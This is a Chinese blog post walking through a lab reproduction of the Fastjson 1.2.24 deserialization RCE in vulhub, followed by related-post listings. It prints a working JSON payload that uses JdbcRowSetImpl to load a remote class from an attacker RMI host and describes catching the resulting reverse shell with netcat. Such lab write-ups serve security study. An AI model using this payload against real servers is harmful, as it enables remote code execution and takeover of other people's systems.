Fastjson 1.2.24反序列化漏洞复现

于 2024-04-17 11:42:59 发布
阅读量382 收藏 4
点赞数 6
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60830484/article/details/137866292
版权
本文介绍了如何利用Fastjson1.2.24版本的序列化漏洞在Java环境中构造恶意JSON数据,通过RMI执行远程恶意代码,最终实现Shell反弹。步骤包括环境配置、恶意文件部署和数据包修改。
摘要由CSDN通过智能技术生成

声明:本次实验仅供学习使用,如有恶意利用后果由使用者承担!!!
1.先前了解:
什么是Fastjson?
Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。是目前 Java 语言中最快的 JSON 库,并且它不依赖于其它任何库。

如何判断Fastjson?
1.手工bp流量包找到json文件,通过修改内容报错判断为fastjson
2.插件自动化分析FastjsonScan

漏洞原理
简单来说就是利用我们恶意构造好的序列化数据让目标服务器进行执行,因此构造我们的恶意数据,使用能够执行RMI(Remote Method Invocation,远程方法调用)协议的序列化数据(注:rmi执行命令时不回显)

2.复现所需环境
环境:kali系统,vulhub靶场,开启web服务,RMI服务(marshalsec-0.0.3-SNAPSHOT-all.jar)
工具:netcat瑞士军刀,bp,exp(java脚本)

3.开始复现
1.开启我们的靶场环境

2.开启对应的web访问服务器,服务器里放置我们的恶意文件Exp.class3.开启我们的RMI服务器,让其访问该服务器执行我们的web服务器里的恶意代码文件

4.启动nc监听端口为9090

5.打开bp进行修改数据包攻击


通过构造该序列化json数据让目标服务器执行rmi中指向web服务器的Exp恶意文件,构造的恶意json数据:

//记得修改标记的content-Type字段,修改为application/json
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.17.4:9999/Exp",
        "autoCommit":true
    }
 
}

成功反弹shell

因此本次Fastjson 1.2.24反序列化漏洞复现成功

嘉子学安全
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fastJson1.2.24漏洞复现
@起风了的博客
05-06 733
背景 fastJson1.2.25版本之前的AutoType 是默认开启的,在1.2.25版本之后就是默认关闭的。 而作怪的就是这个AutoType 恶意类 public class Attack { public Attack() { try { //打开本地计算器 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(com
fastjson-1.2.24漏洞复现
最新发布
qq_43599126的博客
07-04 1063
看完利用链分析后,我们来总结一下,整体来说就是fastjson是根据@type来进行反序列化类并且没有做任何限制,允许指定@type来反序列化任意类,所以导致了反序列化漏洞
fastjson1.2.24反序列化漏洞复现,验证JdbcRowSetImpl
liu649983697的专栏
05-30 1508
fastjson反序列化漏洞复现、实验、验证,远程命令调用、漏洞攻击
fastjson 1.2.24漏洞复现
qq_18831583的博客
01-13 846
fastjson 1.2.24漏洞复现
【渗透测试漏洞复现fastjson1.2.24漏洞复现详细过程
GX233的博客
04-18 6540
fastjson1.2.24 RCE详细复现
fastjson1.2.24反序列化RCE
06-24
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解** 在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...
Fastjson反序列化漏洞史1
08-03
然而,Fastjson在过去的几年里曾曝出一系列的反序列化漏洞,这些漏洞可能被攻击者利用,执行任意代码,从而对系统安全构成威胁。 在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的...
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
薛定谔嘚喵博客
05-30 1140
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-12 2万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理、漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
FastJson1.2.24漏洞复现(详细步骤)
qq_35713681的博客
07-28 406
此测试用的是VM搭的Kali 2023.2。
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6320
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
fastjson-1.2.24漏洞,搭建及复现,手把手图文教程
芜湖~米汤来喽~
10-04 1422
【代码】fastjson-1.2.24漏洞,搭建及复现,手把手图文教程。
Fastjson反序列化漏洞复现(实战案例)
qq_50854662的博客
08-23 1746
Fastjson反序列化漏洞复现(实战案例)
漏洞复现fastjson_1.2.24_unserializer_rce
过期的秋刀鱼
11-04 313
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。
fastjson1.2.24漏洞复现
07-27
对于Fastjson 1.2.24版本的漏洞复现,根据引用\[1\]和引用\[2\]的信息,该版本存在安全漏洞,攻击者可以利用fastjson autotype在处理json对象时,未对@type字段进行安全性验证,从而执行恶意代码。为了修复这个漏洞,建议升级到最新版本1.2.83safeMode加固,或者升级至Fastjson v2。\[3\]因此,如果你想复现Fastjson 1.2.24版本的漏洞,我建议你不要这样做,而是采取相应的安全措施来保护你的系统。 #### 引用[.reference_title] - *1* [FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)](https://blog.csdn.net/q943111495/article/details/121031753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)](https://blog.csdn.net/oiadkt/article/details/130103907)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值